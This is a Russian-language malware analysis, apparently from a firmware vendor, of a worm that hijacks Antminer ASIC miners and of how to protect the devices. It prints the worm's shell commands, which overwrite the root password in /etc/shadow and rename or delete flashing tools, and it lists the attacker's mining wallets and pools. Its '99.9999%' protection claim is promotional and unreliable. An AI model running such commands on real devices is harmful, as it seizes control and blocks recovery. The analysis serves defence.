Как защитить ASIC от вирусов

Появление новых вирусов неизбежно — они регулярно создаются и модифицируются хакерами. Последняя “новинка” несет угрозу для моделей Antminer. Как оказалось, вирус опасен не только для S17, а поддерживает всю линейку Antminer 17 и 15. Этот же вирус ранее встречался на S9, T9, L3 и подобных моделях.

Как защитить ASIC от вирусов

И несмотря на то, что использование прошивок без подписи грозит заражением ASICов, разработчики все еще выпускают прошивки без подписи, тем самым подвергая своих пользователей опасности. Причиной тому отсутствие технических навыков программирования или же это делается специально? Вопрос риторический и пока что остается открытым.

Разработчики прошивок Hiveon ASIC при поддержке MSKminer выяснили, как именно работает этот вирус, каковы его симптомы, и самое главное — как защитить устройства от заражения.

Вирус для Antminer моделей: детальное описание

Анализ проводился на ASICе без вирусов, на стоковой прошивке от 20 августа 2019 года. Рядом с ним в одну сеть поставили зараженный ASIC. В итоге “здоровый” ASIC был заражен.

Вирус старый, распространялся ранее на S9/T9/L3 и другие модели с процессором Xilinx. Вирус определяет модель и в соответствии с ней заражает устройство. В настоящий момент вирус обновился и поддерживает 15 и 17 серию.

Кошельки и пулы, на которые майнит вирус

  • stratum+tcp://scrypt.hk.nicehash.com:3333#xnsub
  • 3BjMWfED7RJvtBPPikJpweDT6A9xRW952x
  • stratum+tcp://scrypt.jp.nicehash.com:3333#xnsub
  • 3BjMWfED7RJvtBPPikJpweDT6A9xRW952x
  • stratumtcp.com:8888
  • stcp
  • stratumtcp.com:3333
  • strtcp


Пути попадания вируса на ASIC:

Вирус из ASICа стучится на все модели Antminer через SSH и веб интерфейс ASICа, используя уязвимость в tar или отсутствие проверки подписи.



При обнаружении http, вирус использует уязвимость в tar при прошивке ASICов. Если нету защиты подписи, вирус попадает просто через скрипт прошивки ASICа.

Этой уязвимости подвержены:

  • Все Antminer на официальной прошивке Bitmain, выпущенной до 1 декабря 2019 года, со стандартным или простым паролем в веб интерфейсе.
  • Все Antminer на неофициальной прошивке, не имеющие защиту в виде подписи сертификатом и проверки на уязвимость в tar, со стандартным или простым паролем в веб интерфейсе.
  • Все Antminer с открытым SSH на стандартном или простом пароле.

Попав на ASIC, вирус:

  • Заменяет web-cgi скрипты прошивки, скрипт загрузки конфига. Также скрипты сброса настроек и редактирования конфигов.
  • Включает SSH. Меняет пароль на SSH:

/etc/init.d/dropbear start ;
sed -i ‘1d' /etc/shadow;

sed -i ‘1i\root:$6$saaYvC9T$PqLC9JWHDZsWYmpB0b0Zf.34b1m5/r9U6A8PPig2qzxAyUN78pyI/vi7OZrCA0T2y1fT5UNFtPiBYuCyBTA610:15975:0:99999:7:::' /etc/shadow ; /etc/init.d/lighttpd restart

  • Заменяет модуль lighttpd, через который будет стучаться на сервер контроля вируса:

  • На 17 серии заменяет загрузчик, в котором запрещена загрузка с SD карты для восстановления. И запрещает ввод команд в u-boot для восстановления через UART.
  • На старых Antminer патчит загрузчик, отключает загрузку с SD.
  • Прописывает себя в автозагрузку в разных местах.
  • Заменяет системные бинарники и скрипты:

  • Прослушивает введенный пользователем пароль в веб-интерфейсе при авторизации, сохраняет на ASICе и отправляет на сервер. Перехват пароля ставит под угрозу все ASICи в сети, т.к более 90% ставят одинаковый пароль на все устройства.
  • Так же постоянно ищет на сервере обновления:

  • Кошелек меняет не только в конфиге, но и при возможности патчит cgminer или bmminer/В старых моделях Antminer патчит бинарники или конфиги:


  • После патча или замены разделов, удаляет бинарники, необходимые для перепрошивки:

mv /usr/sbin/mtd_debug /usr/sbin/mfd;
mv /usr/sbin/nandwrite /usr/sbin/nfd;
mv /usr/sbin/flash_erase /usr/sbin/fla;
rm -rf /usr/sbin/flash* /usr/sbin/nand* /usr/sbin/mtd*

Сам вирус распространяется в виде бинарного файла. Внутри него загрузчик в base64, архивы с эксплоитом, и все скрипты. Вирус не скачивает из интернета дополнительные части вирусов. Если зараженный ASIC попадет в сеть, то заразит другие, несмотря на фаервол на маршрутизаторе. Более того, бывали вирусы, которые прямо на ASIC-ах выполняли команды по скачиванию дополнительных частей, и им “помогал” фаервол.

Пример tar архива для прошивки через веб:

Так же есть еще несколько зашифрованных бинарников, исследование которых продолжается.

Как защитить ASIC

Чтобы избежать заражения, ставьте новую прошивку Bitmain старше 1 декабря, или Hiveon ASIC с подписью и без уязвимостей в обновлении.

Прошивка Hiveon ASIC обеспечивает 99,9999% защиту от вирусов. Система контроля отслеживает и оповещает о проблемах на панели управления.

Цифровая подпись позволяет блокировать работу вируса при установке на зараженную контрольную плату, это зависит от уровня (степени) заражения (иногда без замены контрольной платы вирус не удалить).

Всегда используйте сложные пароли. Пароль на ASIC устройстве и маршрутизаторе должны быть разными.

Обеспечьте защиту ваших устройств заранее, чтобы избежать рисков заражения и возможных трат денег, времени на восстановление.

Не дайте вирусу возможность заразить ваши ASICи и “украсть” вашу прибыль — следуйте всем вышеупомянутым рекомендациям.